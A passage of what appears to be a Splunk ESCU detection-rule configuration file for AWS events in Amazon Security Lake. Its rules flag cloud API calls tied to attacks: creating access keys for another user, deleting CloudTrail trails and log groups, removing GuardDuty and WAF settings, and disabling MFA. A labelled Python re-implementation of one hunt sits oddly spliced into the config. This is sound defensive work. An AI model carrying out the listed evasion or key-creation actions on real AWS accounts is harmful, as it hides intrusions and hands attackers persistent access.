action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection rule monitors for the creation of AWS Identity and Access Management (IAM) access keys. An IAM access key consists of an access key ID and a secret access key, which are used to sign programmatic requests to AWS services. While IAM access keys can be legitimately used by developers and administrators for API access, their creation can also be indicative of malicious activity. Attackers who have gained unauthorized access to an AWS environment might create access keys as a means to establish persistence or to exfiltrate data through the APIs. Moreover, because access keys can be used to authenticate with AWS services without the need for further interaction, they can be particularly appealing for bad actors looking to operate under the radar. Consequently, it's important to vigilantly monitor and scrutinize access key creation events, especially if they are associated with unusual activity or are created by users who don't typically perform these actions. This hunting query identifies when a potentially compromised user creates an IAM access key for another user who may have higher privileges, which can be a sign of privilege escalation. Hunting queries are designed to be executed manually during threat hunting.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs, which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created keys for another user.
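The caller-versus-target comparison this hunting query performs, re-implemented as an added example (not Splunk's code) over constructed Security Lake records; the `unmapped` key/value array stands in for what the search's mvzip/mvexpand/rex sequence unpacks, and all names, ARNs, the account id and IPs are constructed:

```python
"""Hunt for IAM access keys created by one user for a different user.

Added example (not Splunk's code): re-implements the "ASL AWS CreateAccessKey"
hunting search in Python over constructed Security Lake (OCSF) records. The
CloudTrail field `responseElements.accessKey.userName` reaches the search through
the `unmapped` key/value array, which the SPL mvzip/mvexpand/rex sequence unpacks
before comparing it with `identity.user.name`. Names, ARNs, the account id and IPs
below are constructed.
"""
from collections import defaultdict

CONSOLE_UA = "console.amazonaws.com"
TARGET_FIELD = "responseElements.accessKey.userName"


def flatten_unmapped(rec):
    """Mirror of `rename unmapped{}.key ... | mvzip | mvexpand | rex | eval {key} = value`:
    turn [{'key': k, 'value': v}, ...] into a plain {k: v} dict."""
    return {kv["key"]: kv["value"] for kv in rec.get("unmapped", []) if "key" in kv}


def is_candidate(rec):
    """Pre-filter of the search: CreateAccessKey, not from the console, no API error."""
    api = rec.get("api", {})
    return (api.get("operation") == "CreateAccessKey"
            and rec.get("http_request", {}).get("user_agent") != CONSOLE_UA
            and api.get("response", {}).get("error") is None)


def cross_user_key_creations(records):
    """Return {(target_user, caller_name, caller_uid, src_ip): count} for access keys
    a caller created for somebody else; self-service rotations (match=1) are dropped."""
    hits = defaultdict(int)
    for rec in records:
        if not is_candidate(rec):
            continue
        target = flatten_unmapped(rec).get(TARGET_FIELD)
        if target is None:                  # search responseElements.accessKey.userName=*
            continue
        caller = rec["identity"]["user"]
        if caller.get("name") == target:    # eval match=... | search match=0
            continue
        hits[(target, caller.get("name"), caller.get("uid"), rec["src_endpoint"]["ip"])] += 1
    return dict(hits)


def _rec(caller, target, ua="aws-cli/2.15.0", error=None, ip="198.51.100.7"):
    """Constructed OCSF record; only the fields the search touches are populated."""
    api = {"operation": "CreateAccessKey", "service": {"name": "iam.amazonaws.com"}}
    if error:
        api["response"] = {"error": error}
    unmapped = [{"key": "responseElements.accessKey.status", "value": "Active"}]
    if target is not None:
        unmapped.append({"key": TARGET_FIELD, "value": target})
    return {"api": api, "http_request": {"user_agent": ua}, "src_endpoint": {"ip": ip},
            "identity": {"user": {"name": caller, "type": "IAMUser",
                                  "uid": f"arn:aws:iam::111122223333:user/{caller}",
                                  "account_uid": "111122223333"}},
            "unmapped": unmapped}


SAMPLE = [
    _rec("dev-bob", "dev-bob"),                             # self rotation: not a hit
    _rec("dev-bob", "admin-alice"),                         # dev-bob keys an admin: hit
    _rec("dev-bob", "admin-alice"),                         # again, same grouping tuple
    _rec("dev-bob", "admin-alice", ua=CONSOLE_UA),          # console UA is excluded
    _rec("dev-bob", "admin-carol", error="AccessDenied"),   # failed call is excluded
    _rec("ci-role", None),                                  # no userName in response: skipped
]


if __name__ == "__main__":
    for (target, caller, uid, ip), n in cross_user_key_creations(SAMPLE).items():
        print(f"{caller} ({uid}) created {n} access key(s) for {target} from {ip}")
```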
action.escu.creation_date = 2022-05-23
action.escu.modification_date = 2022-05-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS CreateAccessKey - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - ASL AWS CreateAccessKey - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` api.operation=CreateAccessKey http_request.user_agent!=console.amazonaws.com api.response.error=null | rename unmapped{}.key as unmapped_key , unmapped{}.value as unmapped_value | eval keyjoin=mvzip(unmapped_key,unmapped_value) | mvexpand keyjoin | rex field=keyjoin "^(?<key>[^,]+),(?<value>.*)$" | eval {key} = value | search responseElements.accessKey.userName = * | rename identity.user.name as identity_user_name, responseElements.accessKey.userName as responseElements_accessKey_userName | eval match=if(identity_user_name=responseElements_accessKey_userName,1,0) | search match=0 | rename identity_user_name as identity.user.name , responseElements_accessKey_userName as responseElements.accessKey.userName | stats count min(_time) as firstTime max(_time) as lastTime by responseElements.accessKey.userName api.operation api.service.name identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_createaccesskey_filter`

[ESCU - ASL AWS Defense Evasion Delete Cloudtrail - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the entire CloudTrail trail that is logging activities in the environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the entire CloudTrail trail that is logging activities in the environment.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs, which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has stopped CloudTrail logging. Please investigate this activity.
action.escu.creation_date = 2023-05-31
action.escu.modification_date = 2023-05-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS Defense Evasion Delete Cloudtrail - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS Defense Evasion"]
action.risk = 1
action.risk.param._risk_message = User $identity.user.name$ has deleted CloudTrail logging for account id $identity.user.account_uid$
action.risk.param._risk = [{"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}, {"risk_object_field": "identity.user.name", "risk_object_type": "user", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - ASL AWS Defense Evasion Delete Cloudtrail - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the entire CloudTrail trail that is logging activities in the environment.
action.notable.param.rule_title = ASL AWS Defense Evasion Delete Cloudtrail
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` api.operation=DeleteTrail | stats count min(_time) as firstTime max(_time) as lastTime by identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_defense_evasion_delete_cloudtrail_filter`

[ESCU - ASL AWS Defense Evasion Delete CloudWatch Log Group - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs, which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has deleted CloudWatch logging. Please investigate this activity.
action.escu.creation_date = 2023-05-31
action.escu.modification_date = 2023-05-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS Defense Evasion Delete CloudWatch Log Group - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS Defense Evasion"]
action.risk = 1
action.risk.param._risk_message = User $identity.user.name$ has deleted a CloudWatch logging group for account id $identity.user.account_uid$
action.risk.param._risk = [{"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}, {"risk_object_field": "identity.user.name", "risk_object_type": "user", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - ASL AWS Defense Evasion Delete CloudWatch Log Group - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment.
action.notable.param.rule_title = ASL AWS Defense Evasion Delete CloudWatch Log Group
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` api.operation=DeleteLogGroup | stats count min(_time) as firstTime max(_time) as lastTime by identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_defense_evasion_delete_cloudwatch_log_group_filter`

[ESCU - ASL AWS Defense Evasion Impair Security Services - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic looks for several specific Delete API calls made to AWS security services such as CloudWatch, GuardDuty and Web Application Firewalls. These API calls are often leveraged by adversaries to weaken existing security defenses: deleting logging configurations, deleting a set of detectors from your GuardDuty environment, or simply deleting a number of CloudWatch alarms to remain stealthy and avoid detection.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]}
action.escu.data_models = ["Web"]
action.escu.eli5 = This analytic looks for several specific Delete API calls made to AWS security services such as CloudWatch, GuardDuty and Web Application Firewalls. These API calls are often leveraged by adversaries to weaken existing security defenses: deleting logging configurations, deleting a set of detectors from your GuardDuty environment, or simply deleting a number of CloudWatch alarms to remain stealthy and avoid detection.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs, which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = While this search has no known false positives, it is possible that it is legitimate admin activity. Please consider filtering out these noisy events using the userAgent and user_arn field names.
action.escu.creation_date = 2023-06-01
action.escu.modification_date = 2023-06-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS Defense Evasion Impair Security Services - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS Defense Evasion"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - ASL AWS Defense Evasion Impair Security Services - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` api.operation IN ("DeleteLogStream","DeleteDetector","DeleteIPSet","DeleteWebACL","DeleteRule","DeleteRuleGroup","DeleteLoggingConfiguration","DeleteAlarms") | stats count min(_time) as firstTime max(_time) as lastTime by api.operation identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_defense_evasion_impair_security_services_filter`

[ESCU - ASL AWS Excessive Security Scanning - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events and analyzes the number of event names starting with Describe issued by a single user. A high number indicates that this user is scanning the configuration of your AWS cloud environment.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events and analyzes the number of event names starting with Describe issued by a single user. A high number indicates that this user is scanning the configuration of your AWS cloud environment.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs, which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = This search has no known false positives.
action.escu.creation_date = 2023-06-01
action.escu.modification_date = 2023-06-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS Excessive Security Scanning - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS User Monitoring"]
action.risk = 1
action.risk.param._risk_message = User $identity.user.name$ has an excessive number of API calls.
action.risk.param._risk = [{"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}, {"risk_object_field": "identity.user.name", "risk_object_type": "other", "risk_score": 18}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - ASL AWS Excessive Security Scanning - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` api.operation=Describe* OR api.operation=List* OR api.operation=Get* | stats dc(api.operation) as dc_api_operations min(_time) as firstTime max(_time) as lastTime values(http_request.user_agent) as http_request.user_agent values(src_endpoint.ip) as src_endpoint.ip values(cloud.region) as cloud.region values(identity.user.account_uid) as identity.user.account_uid by identity.user.name | where dc_api_operations > 50 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_excessive_security_scanning_filter`

[ESCU - ASL AWS IAM Delete Policy - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following detection identifies when a policy is deleted on AWS. It does not identify whether the attempt succeeded or failed, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy, DetachGroupPolicy, or DetachRolePolicy.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following detection identifies when a policy is deleted on AWS. It does not identify whether the attempt succeeded or failed, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy, DetachGroupPolicy, or DetachRolePolicy.
action.escu.how_to_implement = You must install the Splunk Add-on for AWS v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs, which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = This detection will require tuning to provide high-fidelity detection capabilities. Tune based on source addresses (corporate offices, VPN terminations) or by groups of users. Not every user with AWS access should have permission to delete policies (least privilege). In addition, this may be saved separately and tuned for failed or successful attempts only.
action.escu.creation_date = 2023-06-02
action.escu.modification_date = 2023-06-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS IAM Delete Policy - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - ASL AWS IAM Delete Policy - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` api.operation=DeletePolicy | stats count min(_time) as firstTime max(_time) as lastTime by api.operation api.service.name identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_iam_delete_policy_filter`

[ESCU - ASL AWS Multi-Factor Authentication Disabled - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistence in the environment without adding new users.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1556", "T1556.006"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistence in the environment without adding new users.
action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = AWS Administrators may disable MFA, but it is highly unlikely for this event to occur without prior notice to the company.
action.escu.creation_date = 2023-06-02
action.escu.modification_date = 2023-06-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS Multi-Factor Authentication Disabled - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $identity.user.name$ has disabled Multi-Factor authentication for AWS account $identity.user.account_uid$
action.risk.param._risk = [{"risk_object_field": "identity.user.account_uid", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "identity.user.name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - ASL AWS Multi-Factor Authentication Disabled - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1556", "T1556.006"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistence in the environment without adding new users.
action.notable.param.rule_title = ASL AWS Multi-Factor Authentication Disabled
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` (api.operation=DeleteVirtualMFADevice OR api.operation=DeactivateMFADevice) | stats count min(_time) as firstTime max(_time) as lastTime by api.operation api.service.name identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_multi_factor_authentication_disabled_filter`

[ESCU - ASL AWS New MFA Method Registered For User - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account logged through Amazon Security Lake (ASL). Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account logged through Amazon Security Lake (ASL). Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence.
action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = Newly onboarded users who are registering an MFA method for the first time will also trigger this detection.
action.escu.creation_date = 2023-05-22
action.escu.modification_date = 2023-05-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS New MFA Method Registered For User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = A new virtual MFA device has been added to user $identity.user.name$
action.risk.param._risk = [{"risk_object_field": "identity.user.name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src_endpoint.ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - ASL AWS New MFA Method Registered For User - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account logged through Amazon Security Lake (ASL). Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence.
action.notable.param.rule_title = ASL AWS New MFA Method Registered For User
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` api.operation=CreateVirtualMFADevice | stats count min(_time) as firstTime max(_time) as lastTime by api.operation api.service.name identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_new_mfa_method_registered_for_user_filter`

[ESCU - ASL AWS Password Policy Changes - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events from Amazon Security Lake where a user is making successful API calls to view/update/delete the existing password policy in an AWS organization. It is unlikely for a regular user to conduct this operation. These events may potentially be malicious; adversaries often use this information to gain more understanding of the password defenses in place and exploit them to increase their attack surface when a user account is compromised.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
action.escu.data_models = []
